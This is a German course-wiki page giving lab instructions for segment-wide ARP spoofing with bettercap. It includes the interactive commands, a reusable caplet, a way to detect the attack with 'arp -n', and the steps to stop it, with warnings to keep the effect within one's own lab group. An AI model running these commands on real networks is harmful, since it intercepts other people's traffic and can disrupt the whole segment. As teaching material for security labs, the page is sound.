Arpspoofing mit Bettercap Kompletter Verkehr

Aus Xinux Wiki
Version vom 20. August 2026, 14:26 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „=Bettercap: Kompletter Verkehr im Segment= =Szenario= *INTERFACE=eth0 *Netz: 10.0.10.0/24 Ohne Einschraenkung auf einzelne Ziele vergiftet bettercap alle err…“)
(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Zur Navigation springen Zur Suche springen

Bettercap: Kompletter Verkehr im Segment

Szenario

  • INTERFACE=eth0
  • Netz: 10.0.10.0/24

Ohne Einschraenkung auf einzelne Ziele vergiftet bettercap alle erreichbaren Hosts. Der gesamte Verkehr des Segments laeuft dann ueber den Angreifer - nicht nur die Strecke eines einzelnen Opfers.

Benoetigtes Paket

  • apt-get install bettercap

Angriff auf dem Angreifer

  • bettercap -iface eth0
Im bettercap-Prompt
  • set arp.spoof.targets 10.0.10.0/24
  • set arp.spoof.internal true
  • set arp.spoof.fullduplex true
  • net.probe on
  • arp.spoof on
  • net.sniff on

Optionen

-iface eth0              =  Interface
arp.spoof.targets        =  ganzes Netz statt einzelner Hosts
arp.spoof.internal true  =  auch Host-zu-Host im LAN vergiften, nicht nur Richtung Gateway
arp.spoof.fullduplex     =  beide Richtungen vergiften
net.probe on             =  ARP-Cache vorab fuellen, damit alle MACs bekannt sind
arp.spoof on             =  ARP-Spoofing starten
net.sniff on             =  Mitschnitt starten
Das Gegenstueck zu ettercaps /// /// ist hier arp.spoof.targets 10.0.10.0/24
zusammen mit arp.spoof.internal true. Erst das ganze Netz als Ziel UND internal
true zusammen ergeben "alle gegen alle" - internal allein oder das Netz allein
wuerden nur einen Teil erfassen.

Warnung

Das ist der lauteste und riskanteste MITM ueberhaupt
  • Der Angreifer muss den GESAMTEN Verkehr des Segments weiterleiten. Bei vielen
Hosts wird die Angreifer-Maschine schnell zum Flaschenhals - Pakete gehen
verloren, Verbindungen brechen ab, das ganze Netz wird langsam.
  • Der Angriff ist im Netz sofort auffaellig (ARP-Sturm, doppelte MACs ueberall).
  • Im Kurslabor unbedingt darauf achten, dass nur die eigene Uebungsgruppe
betroffen ist und nicht die Nachbargruppen mit im selben Segment haengen.
Fuer gezieltes Abhoeren ist die Variante mit benannten Zielen (CLIENT/GATEWAY
oder Host-zu-Host) fast immer die bessere Wahl. Das ganze Netz zu spoofen ist
die Demo fuer "so sieht es aus, wenn jemand mit dem Vorschlaghammer kommt".

Als Caplet (reproduzierbar)

Das Caplet ist nichts weiter als die obigen Befehle in eine Datei geschrieben,
damit man sie nicht jedes Mal von Hand tippt.
  • vim seclab-all.cap:
net.probe on
set arp.spoof.targets 10.0.10.0/24
set arp.spoof.internal true
set arp.spoof.fullduplex true
arp.spoof on
net.sniff on
Start
  • bettercap -iface eth0 -caplet seclab-all.cap

Nachweis auf einem beliebigen Host

Mehrere IPs zeigen ploetzlich dieselbe MAC - die des Angreifers
  • arp -n
10.0.10.1     ether   <MAC-der-kali-innen>   C   eth0
10.0.10.103   ether   <MAC-der-kali-innen>   C   eth0
10.0.10.105   ether   <MAC-der-kali-innen>   C   eth0
Wenn quer durch die Tabelle dieselbe MAC auftaucht, laeuft ein Segment-weiter MITM.

Angriff beenden

Im bettercap-Prompt
  • arp.spoof off
  • q
arp.spoof off schickt korrekte ARP-Antworten (re-ARP) an alle betroffenen Hosts,
damit die ARP-Caches wieder stimmen und das Netz normal weiterarbeitet.

Weiterfuehrende Angriffe